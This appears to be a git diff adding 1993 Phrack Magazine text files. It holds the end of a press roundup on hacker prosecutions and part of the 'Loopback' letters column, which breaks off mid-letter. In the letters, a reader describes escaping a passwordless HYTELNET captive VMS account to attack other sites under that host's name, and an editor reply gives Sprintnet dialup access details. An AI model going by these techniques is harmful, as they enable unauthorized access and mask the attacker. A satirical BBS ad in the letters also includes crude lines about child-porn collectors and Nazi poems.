+ordinary laser printer paper, it is estimated that the material would have
+reached a height of 42 meters.
+
+The police were devastated by the verdict, but are now feeling somewhat better
+after the conviction of Woods and Strickland.
+
+The pair, using the nicknames of Pad and Gandalf, would spend up to six hours a
+day at their  computers,  boasting about "smashing" databases.
+
+-----------------------------------------------------------------------------
+
+Computers Turned My Boy Into A Robot                    March 18, 1993
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By Martin Phillips (Daily Mirror)(Page 1)
+
+ Connie Bedworth said she was powerless to control the "monster" as he
+ glued himself to the screen nearly 24 hours as day.  "He didn't want
+ to eat or sleep--he just couldn't bear to be away from it, " she said.
+
+ A jury decided Paul Bedworth, now 19, was so "hooked" he could not stop
+ himself hacking in to companies' systems -- allegedly costing them
+ thousands of dollars.
+
+-----------------------------------------------------------------------------
+
+Hot For The Fingertips: An Internet Meeting Of Minds    May 23, 1993
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Frank Bajak (Associated Press)
+
+ NEW YORK -- Somewhere in the ether and silicon that unite two workstations 11
+ floors above lower Broadway, denizens of the cyberpunk milieu are feverishly
+ debating whether anyone in government can be trusted.
+
+ This is the 12-by-20-foot bare-walled home of MindVox, today's recreation hall
+ for the new lost generation's telecomputing crowd.  You can enter by phone
+ line or directly off Internet.
+
+ Patrick Kroupa and Bruce Fancher are the proprietors, self-described former
+ Legion of Doom telephone hackers who cut the cord with computing for a time
+ after mid-1980s teen-age shenanigans.
+
+ Kroupa is a towering 25-year-old high school dropout in a black leather jacket,
+ with long hair gathered under a gray bandanna, three earrings and a hearty
+ laugh.
+
+ Fancher is 22 and more businesslike, but equally in love with this dream he
+ left Tufts University for.
+
+ They've invested more than $80,000 into Mindvox, which went fully operational
+ in November and has more than 2,000 users, who pay $15 to $20 a month plus
+ telephone charges.
+
+ MindVox aspires to be a younger, harder-edged alternative to the WELL, a
+ fertile 8-year-old watering hole for the mind in Sausalito, California, with
+ more than 7,000 users, including scores of computer age luminaries.
+
+ One popular feature is a round-table discussion on computer theft and security
+ hosted by a U.S. Treasury agent.  The latest hot topic is the ease of breaking
+ into a new flavor of local access network.
+
+-----------------------------------------------------------------------------
+
+Hi Girlz, See You In Cyberspace                         May 1993
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Margie (Sassy Magazine) (Page 79)
+
+ [Margie hits the net via Mindvox.  Along the way she discovers
+  flame wars, sexism, and a noted lack of females online.  This
+  is her story.  :) ]
+
+-----------------------------------------------------------------------------
+
+Hacker Accused of Rigging Radio Contests                April 22, 1993
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By Don Clark (San Francisco Chronicle)
+
+ A notorious hacker was charged yesterday with using computers to
+ rig promotional contest at three Los Angeles radio stations, in
+ a scheme that allegedly netted two Porsches, $20,000 in cash and
+ at least two trips to Hawaii.
+
+ Kevin Lee Poulsen, now awaiting trial on earlier federal charges,
+ is accused of conspiring with two other hackers to seize control of
+ incoming phone lines at the radio stations.  By making sure that only
+ their calls got through, the conspirators were assured of winning the
+ contests, federal prosecutors said.
+
+ A new 19-count federal indictment filed in Los Angeles charges
+ that Poulsen also set up his own wire taps and hacked into computers
+ owned by California Department of Motor Vehicles and Pacific Bell.
+ Through the latter, he obtained information about the undercover
+ businesses and wiretaps run by the FBI, the indictment states.
+
+ Poulsen, 27, is accused of committing the crimes during 17
+ months on the lam from earlier charges of telecommunications and
+ computers fraud filed in San Jose.  He was arrested in April 1991
+ and is now in the federal Correctional Institution in Dublin.  In
+ December, prosecutors added an espionage charge against him for his
+ alleged theft of a classified military document.
+
+ The indictment announced yesterday adds additional charges of
+ computer and mail fraud, money laundering, interception of wire
+ communications and obstruction of justice.
+
+ Ronald Mark Austin and Justin Tanner Peterson have pleaded guilty
+ to conspiracy and violating computer crime laws and have agreed to
+ help against Poulsen.  Both are Los Angeles residents.
+
+ Poulsen and Austin have made headlines together before.  As
+ teenagers in Los Angeles, the two computer prodigies allegedly broke
+ into a Pentagon-organized computer network that links researchers and
+ defense contractors around the country.
+
+-----------------------------------------------------------------------------
+
+SPA Tracks Software Pirates on Internet                 March 22, 1993
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By Shawn Willett (InfoWorld)(Page 12)
+
+ The Software Publishers Association has begun investigating reports of
+ widespread piracy on the Internet, a loose amalgam of thousands of computer
+ networks.
+
+ The Internet, which began as a Unix-oriented, university-based communi-
+ cations network, now reaches into corporate and government sites in 110
+ countries and is growing at a rapid pace.
+
+ The software theft, according to Andrew Patrizio, an editor at the
+ _Software Industry Bulletin_, has been found on certain channels, particularly
+ the warez channel.
+
+ "People are openly talking about pirating software; there seems to be no
+ one there to monitor it", Patrizio said.
+
+ A major problem with the Internet is that the "sites" from where the
+ software is being illegally downloaded can physically be located in countries
+ that do not have strong antipiracy laws, such as Italy or the former Soviet
+ Union.  The Internet also has no central administrator or system operator.
+
+ "Policing the entire Internet would be a job", said Peter Beruk,
+ litigation manager for the SPA, in Washington.  "My feeling would be to target
+ specific sections that are offering a lot of commercial software free for the
+ download", he said.
+
+---------------------------------------------------------------------------
+
+Socialite's Son Will Have To Pay $15,000 To
+Get His Impounded 1991 BMW Back                         March 23, 1993
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By John Makeig (Houston Chronicle)(Page 14A)
+
+ Kenyon Shulman, son of Houston socialite Carolyn Farb will have to pay
+ 15 thousand dollars to get back his 1991 BMW 325i after being impounded
+ when Houston police found 400 doses of the drug ecstasy in its trunk.
+
+ This is just the latest brush with authorities for Shulman who in 1988
+ was raided by Harris County authorities for using his personal computer
+ to crack AT&T codes to make free long distance calls.
+
+--------------------------------------------------------------------------
+
+Austin Man Gets 10 Years For Computer Theft, Sales      May 6, 1993
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By Jim Phillips (Austin American Statesman)(Page B3)
+
+ Jason Copson, who was arrested in July under his alias Scott Edward Berry,
+ has been sentenced to 10 years on each of four charges of burglary and
+ one count of assault.  The charges will run concurrently.  Copson still
+ faces charges in Maryland and Virginia where he served a prison term and
+ was serving probation for dealing in stolen goods.  Police arrested Copson
+ and Christopher Lamprecht on July 9 during a sting in which the men tried to
+ sell computer chips stolen from Advanced Micro Devices.
+
+---------------------------------------------------------------------------
+Treasury Told Computer Virus Secrets                  June 19, 1993
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By: Joel Garreau (Washington Post) (Page A01)
+
+ For more than a year, computer virus programs that can wreak havoc with
+ computer systems throughout the world were made available by a U.S. government
+ agency to anyone with a home computer and a modem, officials acknowledged this
+ week.
+
+ At least 1,000 computer users called a Treasury Department telephone number,
+ spokesmen said, and had access to the virus codes by tapping into the
+ department's Automated Information System bulletin board before it was muzzled
+ last month.
+
+ The bulletin board, run by a security branch of the Bureau of Public Debt in
+ Parkersburg, W.Va., is aimed at professionals whose job it is to combat such
+ malicious destroyers of computer files as "The Internet Worm," "Satan's Little
+ Helper" and "Dark Avenger's Mutation Engine." But nothing blocked anyone else
+ from gaining access to the information.
+
+ Before the practice was challenged by anonymous whistleblowers, the bulletin
+ board offered "recompilable disassembled virus source code"-that is, programs
+ manipulated to reveal their inner workings. The board also made available
+ hundreds of "hackers' tools"-the cybernetic equivalent of safecracking aids.
+ They included "password cracker" software-various programs that generate huge
+ volumes of letters and numbers until they find the combination that a computer
+ is programmed to recognize as authorizing access to its contents-and "war
+ dialers," which call a vast array of telephone numbers and record those hooked
+ to a computer.
+
+ The information was intended to educate computer security personnel,
+ according to Treasury spokesmen. "Until you understand how penetration is done,
+ you can't secure your system," said Kim Clancy, the bulletin board's operator.
+
+ The explosion of computer bulletin boards-dial-up systems that allow users
+ to trade any product that can be expressed in machine-readable zeros and
+ ones-has also added to the ease of virus transmission, computer analysts say.
+ "I am Bulgarian and my country is known as the home of many productive virus
+ writers, but at least our government has never officially distributed viruses,"
+ wrote Vesselin Vladimirov Bontchev of the Virus Test Center of the University
+ of Hamburg, Germany.
+
+ At first, the AIS bulletin board contained only routine security alert
+ postings. But then operator Clancy "began to get underground hacker files and
+ post them on her board," said Bruce Sterling, author of "The Hacker Crackdown:
+ Law and Disorder on the Electronic Frontier." "She amassed a truly impressive
+ collection of underground stuff. If you don't read it, you don't know what's
+ going to hit you."
+
+ Clancy, 30, who is a former Air Force bomb-squad member, is highly regarded
+ in the computer security world. Sterling, one of the nation's foremost writers
+ about the computer underground, called her "probably the best there is in the
+ federal government who's not military or NSA (National Security Agency).
+ Probably better than most CIA."
+
+ Clancy, meanwhile, is staying in touch with the underground. In fact, this
+ week, she said, she was "testing a product for some hackers." Before it goes
+ into production, she will review it to find potential bugs. It is a new war
+ dialer called "Tone-Loc." "It's an extremely good tool. Saves me a lot of
+ trouble. It enables me to run a hack against my own phone system faster" to
+ determine points of vulnerability.
+
+-----------------------------------------------------------------------------
+
+        [AGENT STEAL -- WORKING WITH THE FEDS]
+
+
+         IN THE UNITED STATES DISTRICT COURT
+
+         FOR THE NORTHERN DISTRICT OF TEXAS
+
+                  DALLAS DIVISION
+         -----------------------------------
+
+THE UNITED STATES OF AMERICA   *
+                               *
+V.                             * CRIMINAL NO. 3-91-194-T
+                               * (FILED UNDER SEAL)
+JUSTIN TANNER PETERSEN (1)     *
+
+JOINT MOTION TO SEAL
+
+     COMES NOW the United States of America, by its United
+
+States Attorney, at the request of the defendant, and hereby
+
+requests that this Honorable Court seal the record in this case.
+
+In support thereof, the United States states the following:
+
+     1. The case is currently being transferred to the
+
+Middle District of California for plea and disposition pursuant
+
+to Federal Rule of Criminal Procedure 20;
+
+     2. The defendant is released on bond by the United
+
+States District Court for the Middle District of California;
+
+     3. The defendant, acting in an undercover capacity,
+
+currently is cooperating with the United States in the
+
+investigation of other persons in California; and
+
+     4. The United States believes that the disclosure of
+
+the file in this case could jeopardize the aforesaid
+
+investigation and possibly the life of the defendant.
+
+Consequently, the United States requests that this Honorable
+
+Court seal the record in this case.
+
+               Respectfully submitted,
+               MARVIN COLLINS
+               United States Attorney
+
+
+
+               LEONARD A. SENEROTE
+               Assistant United States Attorney
+               Texas State Bar No. 18024700
+               1100 Commerce Street, Room 16G28
+               Dallas, Texas 75242-1699
+               (214) 767-0951
+
+          CERTIFICATE OF CONFERENCE
+
+     The defendant joins in this motion.
+
+
+
+               LEONARD A. SENEROTE
+               Assistant United States Attorney
+
+
+[The entire file of information gathered from the courts regarding
+ Agent Steal is available from Phrack for $5.00 + $2 postage]
+ -------------------------------------------------------------------------
diff --git a/phrack43/3.txt b/phrack43/3.txt
new file mode 100644
index 0000000..6f1c74e
--- /dev/null
+++ b/phrack43/3.txt
@@ -0,0 +1,952 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Three, File 3 of 27
+
+                                Phrack Loopback
+                                    Part II
+
+======================================================================
+                      ToneLoc T-Shirt Offer
+======================================================================
+
+Yes, the rumors are true: A ToneLoc t-shirt is at last available.
+
+The shirt is an extra large, 100% cotton Hanes Beefy-T, silk screened
+with four colors on front and eight colors on back.
+
+The front features an "anti-bell" logo, with your favorite corporate
+symbol in blue under a slashed circle in red. The ToneLoc logo appears
+above, with an appropriate quote below.
+
+The back has six Tonemaps, visual representations of exchange scans,
+contributed by ToneLoc'ers from around the globe. The exchange and
+scanner's handle is printed below each Tonemap. The handles of the beta
+testing team are listed below the maps.
+
+If you act now, a free copy of the latest release of ToneLoc will be
+included with your order! Please specify 3.5" or 5.25" disks.
+
+$15 postpaid; add $5 for international orders.
+Make your check or money order payable to "ToneLoc Shirt."
+
+Send to:
+
+ToneLoc Shirt
+12407 Mopac Expwy N #100-264
+Austin, TX  78758
+Voice Mail (24 hours): 512-314-5460
+
+- Mucho Maas
+- Minor Threat
+
+
+[Editor:  I have one of these.  The only hacker program immortalized in
+          cotton.  Nifty!]
+
+******************************************************************************
+
+ The return of a telecom legend...
+
+
+ &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
+ &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
+ &&  &&&&&&&  &&&&&          &&&&&&&&&&&  &&&&&&&&&  &&&&&&&&&&&&&&   &&&&&&&&
+ &&   &&&&&   &&&&&&&&&  &&&&& &&&&&  &&  &&&&&&&&    &&&&&&&&&&&&&    &&&&&&&
+ &&    &&&    &&&&&&&&&  &&&&   &&&&  &&  &&&&&&&  &&  &&&&&&&&  &&  &  &&&&&&
+ &&  &  &  &  &&&&&&&&&  &&&  &  &&&  &&  &&&&&&&  &&  &&&&&&&&  &&  &&  &&&&&
+ &&  &&   &&  &&     &&  &&  &&&  &&  &&  &&&&&&&  &&  &&&&&&&&  &&  &&&  &&&&
+ &&  &&& &&&  &&  &&&&&  &&  &&&  &&  &&  &&&&&&&  &&  && &&&&&  &&  &&&&  &&&
+ &&  &&&&&&&  &&  &&&&&  &&  &&&  &&  &&  &&&&&&&  &&  &&  &&&&  &&  &&&&&  &&
+ &&  &&&&&&&  &&  &&&&&  &&       &&  &&  &&&&&&&  &&  &&   &&&  &&  &&&&&  &&
+ &&  &&&&&&&  &&  &&&&&&&&&  &&&  &&  &&  &&&&&&&  &&  &&    &&  &&  &&&&  &&&
+ &&  &&&&&&&  &&  &&&&&&&&&  &&&  &&  &&       &&      &&  &  &  &&  &&&  &&&&
+ &&  &&&&&&&  &&    &&&&&&&  &&&  &&  &&&&&&&&&&&  &&  &&  &&    &&  &&  &&&&&
+ &&  &&&&&&&  &&  &&&&&&&&&  &&&  &&  &&&&&&&&&&&  &&  &&  &&&   &&  &  &&&&&&
+ &&  &&&&&&&  &&     &&&&&&&&&&&&&&&  &&&&&&&&&&&  &&  &&&&&&&&  &&    &&&&&&&
+ &&  &&&&&&&  &&&&&&&&&&&&&&&&&&&&&&          &&&&&&&&&&&&&&&&&& &&   &&&&&&&&
+ &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
+ &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
+
+
+                          S  O  U  T  H  W  E  S  T
+
+                A Neon Knights/Metal Communications Experience
+
+                                     cDc
+                                    _   _
+                                   ((___))
+                                   [ x x ]
+                         cDc        \   /        cDc
+                                    (' ')
+                                     (U)
+
+              '..and none but the Bovine survived the onslaught'
+
+                     -cDc-   CULT OF THE DEAD COW   -cDc-
+                              cDc communications
+                         -cDc-   D0PE SYSTEM   -cDc-
+                         ---------------------------
+
+                                  Very K-Rad
+                                 713-468-5802
+                                No Lame Ratios
+                               Running Baphomet
+                              Sysd00d : Drunkfux
+                             86,400 Seconds A Day
+                            OoOOooOdlez o' T-Files
+                           The Official HoHoCon BBS
+                          New Pimping Tips Every Day
+                         Tonz o' Nifty Ascii Pictures
+                        Talk To Satan Himself.. Live!!
+                       Free 5-Digit Metro K0DEZ For All
+                      d0Pe Gifs Of Gail Thackeray Online
+                     Read Hate Filled Nazi Skinhead Poemz
+                    Home Of K-RAP : The K-Rad Ascii Possee
+                   Learn How To Make Money! Just Ask Byron!
+                  Necropheliacs & Kidporn Kollekt0rz Welcome
+                 Y0 Y0 Y0 Lonely D00dz! We gotz girlie uzerz!
+                Lots Of Message Bases With Really K-KeWL Names
+               Is This Whole "Volcano Ad" Thing Stupid Or What?
+              GNU Warez From The Future! We Have A Time Machine!
+             I Think We Have One Of Those Big, EL8 Drive Thingies
+            No Net Access? Submit Your cDc & Phrack Articles Here!
+           The Only System Authorized By The Debbie Gibson Fan Club
+          The Neon Knights Did NOT Die, We Just Went Way Underground
+         This Thing Is Starting To Look Like That Album St0nerzz Like
+        Mega KooL Games Like Lemonade Stand And Hunt The Wumpus Deluxe
+       Hey! It's The Mashed Potato Mountain Thing From Close Encounters
+      Users Include Lots Of Elite Peoplez You See On Shows Like Dateline
+     That Really Trendy Super High Speed Modem All Those Warez DooDz Have
+    cDc / CuD / dFx / Neon Knights / NIA / Phrack / uXu / Video Vindicator
+   Telco / Systems / Networks / Security / Cellular / Satan / Death / K0DEZ
+
+***************************************************************************
+
+Hi there!
+
+As a beginner in Cyberspace & a new reader of Phrack, I just wanna say thiz...
+IT'S X-CELLENT DUDES!!!!!.
+
+Keep the good work!!!!!.
+
+I only have your latest issue, and I never read previous ones, so this
+is maybe old stuff... but I would like to see the Infonet network and
+Datapac covered in some of UR articles... let me know if u published something
+in recent issues.
+
+Greetings from South America,
+
+LawEnforcer.
+(yes, it's an Alias!!!)
+
+[Editor:  Well, InfoNet we've never done.  Any takers?  Datapac I
+          personally scanned some time ago, but almost ALL of the
+          100K of NUA's I found still work.  Maybe someone should
+          take my script and re-scan it.  Anyone?  Class?  Bueler?]
+
+****************************************************************************
+
+begin contribution-------------------------------
+VMS machines that have captive accounts often have accounts such as HYTELNET.
+This is an account which will archie for you, or take you to a few select BBSs
+or any of many boring things to do.  You simply log in as HYTELNET, there isn't
+a password, and go through the menus.  Now, that's where the fun begins.  If
+you use HYTELNET to telnet anywhere, while it is connecting, simply  type your
+local telnet escape key (something like ^\ or ^]) and then........you have a
+telnet prompt.  Unfortunately, if you close or disconnect, it will return to
+the HYTELNET menus, and you can't open a new connection, since you're already
+connected.  So, what you do is SPAWN whatever process you want.....you could
+SPAWN TELNET or SPAWN FTP or SPAWN anything else for that matter.  SPAWN with
+no arguments (the shell escape) does not work, however.  This works from any
+captive account that telnets.  So, you can telnet to a VAX that has HYTELNET,
+log in as HYTELNET, do what I told you, and then hack to wherever, since the
+reports from the target site will show that HYTELNET@insert.vax.site committed
+the heinous crimes that you did.
+                                                  Kaneda
+end contribution--------------------------------
+
+[Editor:  Kaneda:  thanks for that tidbit.  Now I'm sure to get grief
+          on IRC from someone coming from an odd site.  :)
+          Give my regards to Tetsuo.  "But some day...we will be"]
+
+****************************************************************************
+
+  _   _
+ ((___))
+ [ x x ] cDc communications
+  \   /  Global Domination Update
+  (' ')  #12 - April 1st, 1993
+   (U)
+Est. 1986
+
+ New gNu NEW gnU new GnU nEW gNu neW gnu nEw releases for April, 1993:
+
+ _________________________________/Text Files\_________________________________
+
+221: "Sickness" by Franken Gibe.  Paralyzed by thoughts.  Rage!  Fight!  Dark!
+
+222: "A Day in the Life of Debbie G1bs0n" by The Madwoman.  The pop idol faces
+her arch enemy on the fields of ninja combat and in the arms of love.
+
+223: "The B!G Envelope Stuffing Scam" by Hanover Fiste.  How to get money.
+Make Sally Struthers proud of you.
+
+224: "The Bird" by Obscure Images.  Story 'bout a sad guy who laughs at birds.
+It's depressing.  Oi's a kooky guy.
+
+225: "Tequila Willy's Position Paper" by Reid Fleming and Omega.  Unknown to
+most, Tequila Willy thew his hat in the ring for the 1992 presidential
+election.  Here's the paper detailing his positions on all the important
+issues.  Better luck in '96, eh?
+
+226: "Simple Cryptology" by Dave Ferret.  Introductory guide to cryptology
+which also includes a good list of other sources to look into.
+
+227: "Big Ol' Heaping Pile of Shit" by Suicidal Maniac.  Buncha poems about
+lots of things.  Wacky.
+
+228: "ISDN: Fucking the Vacuum Cleaner Attachments" by Reid Fleming.  Intended
+for _Mondo 2000_, this file drops science about everyone's favorite future
+phone system.
+
+229: "The Evil Truth About Peter Pan" by Lady Carolin.  It's a whole mess of
+things you and your puny little mind might not have noticed about this popular
+kiddie (hah!) story.
+
+230: "The 2:00 O'Clock Bus" by Tequila Willy and Bambi the Usurper.  Geriatric
+porn with some doggy flavor.
+
+ _____________________________/Other Stuff to Get\_____________________________
+
+From: cDc communications/P.O. Box 53011/Lubbock, TX  79453
+
+This is Swamp Ratte's stuff:
+
+     All the cDc t-files on disk by mail, for convenience sake!  Specify
+     MS-DOS or Apple II format 3.5" disks.  $3.00 cash.
+
+     cDc stickers!  Same design as were flying around at HoHoCon, with the
+     scary-lookin' cow skull.  k00l.  Send a SASE and 50 cents for a dozen of
+     'em (or just send a dollar).
+
+     Weasel-MX tape!  _Obvious_ 45-minute cassette.  This is Swamp Ratte's
+     funk/punk-rock/hip-hop band.  It's a mess, but fun.  $3.00 cash.
+
+     cDc hat!  Yeah, get yer very own stylin' black baseball cap embroidered
+     with the cDc file-header-type logo on the front in white.  This isn't the
+     foam-and-mesh cheap kind of hat; it's a "6-panel" (the hat industry term)
+     quality deal.  Roll hard with the phat cDc gear.  $15.00 plus a buck for
+     postage.
+
+     _Swingin' Muzak_ compilation tape!  An hour of rockin' tuneage from
+     Weasel-MX (all new for '93), Counter Culture, Acid Mirror, Truth or
+     Consequences, Grandma's V.D., and Sekrut Squirrel.  Lotsa good, catchy,
+     energetic stuff for only $5.00 cash.
+ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+From: FNORD! Publications/2660 Trojan Dr. #912/Green Bay, Wisconsin 54304-1235
+
+This is Obscure Images' stuff:
+
+     FNORD! 'zine #1 & #4 - $2.00 Each
+
+     Shoggoth 912 #1 - $0.75
+
+     For some snarly techno grooves, send away for the new tape from Green
+     Bay's finest (and only) technorave sensation, I OPENING!  IO-Illumination
+     Demo Tape (7 songs of joy) - $5.00
+ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+From: Freeside Orbital Data Network/ATTN:dFx-HoHoCon-cDc/11504 Hughes Road #124
+      Houston, TX  77089
+
+This is Drunkfux's stuff:
+
+     HoHoCon '92 T-Shirts : Black : XL : Elite : Stylish : Dope : Slammin'
+     Only $15 + $2 shipping ($2.50 for two shirts).
+     Your choice of either "I LOVE FEDS" or "I LOVE WAREZ" on front, where
+     "LOVE" is actually a red heart, ala "I LOVE N.Y." or "I LOVE SPAM."
+     On the back of every beautimus shirt is...
+
+                                dFx & cDc Present
+
+                                   HOHOCON '92
+
+                                 December 18-20
+                                 Allen Park Inn
+                                 Houston, Texas
+
+     HoHoCon '92 VHS Video : 6 Hours : Hilariously Elite : $18 + $2 Shipping
+
+     Please make all checks payable to O.I.S.  Free cDc sticker with every
+     order!  w0w!
+ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+From: Bill's Shirt Thing/P.O. Box 53832/Lubbock, TX/79453
+
+This is Franken Gibe's stuff:
+
+     AIDS sucks!  Order a catalog!  Nifty t-shirts that make you happy.
+     Proceeds go to local AIDS Resource Center.  Send a $0.29 stamp for the
+     cat'.
+ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+From: Teach Me Violence magazine/61 East 8th St./Suite 202/New York, NY  10003
+
+This is The Pusher's stuff:
+
+     Teach Me Violence 'zine:
+     Issue #1 (Mr. Bungle, COC, Murphy's Law)
+     Issue #2 (Helmet, Supertouch, Agnostic Front, American Standard)
+     Issue #3 (Faith No More, Chris Haskett, Cathedral, Iceburn, Venom)
+     $3.00 cash each
+ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+From: A Day In The Life Of.../P.O. Box 94221/Seattle, WA  98124
+
+This is Lady Carolin's stuff:
+
+     A Day In The Life Of... 'zine, free with two stamps.
+
+     Bi-monthly contact list of girlie bands/grrrl bands/female vocalists.  $1.
+ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+ __________________________________/cDc Gnuz\__________________________________
+
+                           "cDc: savin' trees in '93"
+
+Hiya once again, here's whassup:
+
+NEW Internet FTP site: zero.cypher.com.  This is Drunkfux and Louis Cypher's
+chilly-the-most deal.  Login as "anonymous" and get all the cDc stuph fast fast
+fast.
+
+NEW cDc Mailing list: Get on the ever-dope and slamagnifiterrific cDc mailing
+list!  Send mail to cDc@cypher.com and include some wonderlessly elite message
+along the lines of, "ADD ME 2 DA MAILIN LIZT!!@&!"
+
+NEW Official cDc Global Domination Factory Direct Outlets:
+Cyberspace.Nexus               +31-67-879307 [Belgium]
+Mirrorshades BBS               903/668-1777
+The Ministry of Knowledge      401/043-3446
+The Crowbar Hotel              713/373-4031
+
+We're always taking t-file submissions, so if you've got a file and want to
+really get it out there, there's no better way than with cDc.  Upload text to
+The Polka AE, or my Internet address, or send disks or hardcopy to the cDc post
+office box in Lubbock, TX.
+
+NEW updated CDCKC0W.TXT file.  All the information for sysops to get going
+running Factory Direct Outlets.  It should be available from wherever you got
+this Update.
+
+NEW CDCV9.ZIP is out containing cDc t-files 201-225.  Factory Direct Outlet
+sysops should get this and put it up on their systems.
+
+See ya in May.
+
+S. Ratte'
+cDc/Editor and P|-|Ear13zz |_3@DeRrr
+"We're into t-files for the girlies and money."
+
+Write to: cDc communications, P.O. Box 53011, Lubbock, TX  79453.
+Internet: sratte@cypher.com, sratte@mindvox.phantom.com.
+
+
+[Editor:  Whew.  Any word on those cDc Glow in The Dark Toilet
+          Seat Covers?  I've got my 29.95 ready!]
+
+****************************************************************************
+
+Hey there a few of us use this account and wuld like to get phrack
+sent to us here if at all possible... :)
+We are all Australians and all read your magazine to death..
+a friend of mine runs a board called shred til ya ded which is basically
+a hpac and warez assortment... nothing 0 day but definately good for hacking
+info... we are in the middle of getting all of your mags online at the moment
+you mentioned in phrack 42 that you would like people from other countries
+to write pieces about the scene there... well depending on the kind of thing
+you want i would be more than happy to give it a go with some mates
+thanks
+Darkstar
+
+
+[Editor:  Darkstar and anyone else--send me your files about your
+          scenes in other countries.  Nearly everyone who promised me
+          a file about their country flaked out.  You'll see who did
+          send me a file later in this issue.  Other countries:  get
+          off your duffs and send me a file!  We want to know what
+          goes on there!  Boards, Busts, History, Hackers, Hangouts,
+          Groups, Greats, Legends, Lore, EVERYTHING!]
+
+***************************************************************************
+
+I remember seeing a message somewhere on the WELL saying an issue of
+Phrack carried listings of Viruses.  Could you tell me which one(s)?
+
+Also, do you know of any sites which have virus listings archived ?
+
+Thanks,
+
+Jon Barber
+
+[Editor:  Well, John, Phrack doesn't carry virii info.  You might
+          check around for 40hex.  Personally, I think virii
+          are vastly overrated hype driven onward by McAffee
+          and other self-serving interests.  That is why we
+          ignore them.  (That is also why I don't mention them
+          when I lecture on computer security...they are no
+          big thing.)]
+
+****************************************************************************
+
+Ok,
+
+So I was reading Phrack 42's listing for SprintNET nodes... But there was
+no information on how to access it..
+
+What are the ACNS For the Sprintnet?  Is there a Phrack out that details
+use of the SprintNET..
+
+Would appreciate ANY and ALL, as I've never heard of it being used widely
+like the Internet, and would like to know how to use it..
+
+Jack Flash...
+
+[Editor:  Jack...you kids are spoiled.  You and your Internet.  Hrumph.
+          Remember when Arpanet was like a 20 or so Universities and
+          Contractors, and tied to about 100 bases thru Milnet?  No?
+          Sheesh.
+
+          To answer your question, Sprintnet (used to be Telenet, and
+          always will be to me) is a public packet switched network.
+          It can be accessed in nearly EVERY city in the USA, and in
+          many large cities in other countries.
+
+          The Toll-Free dialups are:  300-2400:  800-546-1000
+                                     9600 v.32:  800-546-2500
+
+          At the TERMINAL= prompt, type D1.  Then to find a local
+          dialup, at the @ prompt type MAIL.  Login as username
+          PHONES password PHONES.]
+
+*****************************************************************************
+
+RE: Loop-Back
+
+I was wondering if it would be possible for you to do something on Novell LAN
+security, as we have one at my high school. I was also wondering about
+bluebox tones...in my area, if you call  into the next county, sometimes you
+hear what sounds like bluebox tones. I had thought these lines were digital,
+and therefore, would not require tones of any type.. any ideas?
+
+RF Burns
+
+[Editor:  As for the Novell...check later in this issue.
+          As for the MF tones...when calls go from one area to another
+          it is quite common to hear multi-frequency tones.  Depending
+          upon the way the call is routed, your particular pick of LD
+          carrier and the equipment between you and the destination,
+          you may hear these tones.  You may even be one of the lucky
+          ones, and be able to seize a trunk.  Using certain LD carriers
+          you can still box, but usually you are stuck with a trunk that
+          can't get out of the area.  Alas.]
+
+*****************************************************************************
+
+Hi -
+
+I'm a student in the MLS program here at SUNY Albany.  I
+found out about Phrack while researching a paper for my public policy class,
+on the ECPA and shit.
+
+Well, I gave a fabulous 45-minute presentation on it all and then wrote
+an even better paper for which I was rewarded with an A as well as an A
+for the class.  Turns out John Perry Barlow and Mitch Kapor are heroes of
+my professor as well.
+
+So now I'm hooked.  For my thesis I'm writing a user manual for librarians
+on the Internet and helping teach a class in telecommunications.
+
+Just wanted to let you phrack-types know you're my heroes and I want to be
+a member of the phrack phamily.  Can't send any money, though.  *:(
+
+Keep the faith,
+        hopey t
+
+
+[Editor:  That's really great!  Usually profs are terribly anal about
+          anything regarding Phrack and/or hacking.  You are very
+          lucky to have had such an instructor.  Congrats on the
+          class and good luck with your thesis!]
+
+****************************************************************************
+
+    Hi!
+    I was just glancing through Phrack #42, and read the portion
+that sez that all computer professionals (essentially) have to
+delete this and even old copies of Phrack.
+    Coupla questions: I'm a Network Administrator for a University,
+do I have to comply? It's not like I am a thug from Bellcore or
+anything like that. Although one of the things I am concerned with,
+professionally, is the security of our systems, I am no Cliff Stoll.
+If I were to catch an unauthorized visitor, I would give him the boot,
+not chase him down with prosecution in mind.
+    I have, of course, deleted all my old Phracks as well as #42,
+but I would like to be able to re-snarf them. Let me know...
+                                           Thanks!
+                                           Dan Marner
+
+[Editor:  Well, Dan, technically Phrack could quite possibly
+          be beneficial to you and assist you with your career, and
+          this is the typical scenario in which we request that you
+          register your subscription and pay the registration fee.
+          Of course, we don't have the SS as our own personal
+          thugs to go break your legs if you don't comply. :)
+          You might at least try to get your employer to pay for
+          the subscription.
+
+          As far as issues prior to 42 go, KEEP THEM!  They are
+          exempt from anything, and are arguably public domain.]
+
+*****************************************************************************
+
+Hey,
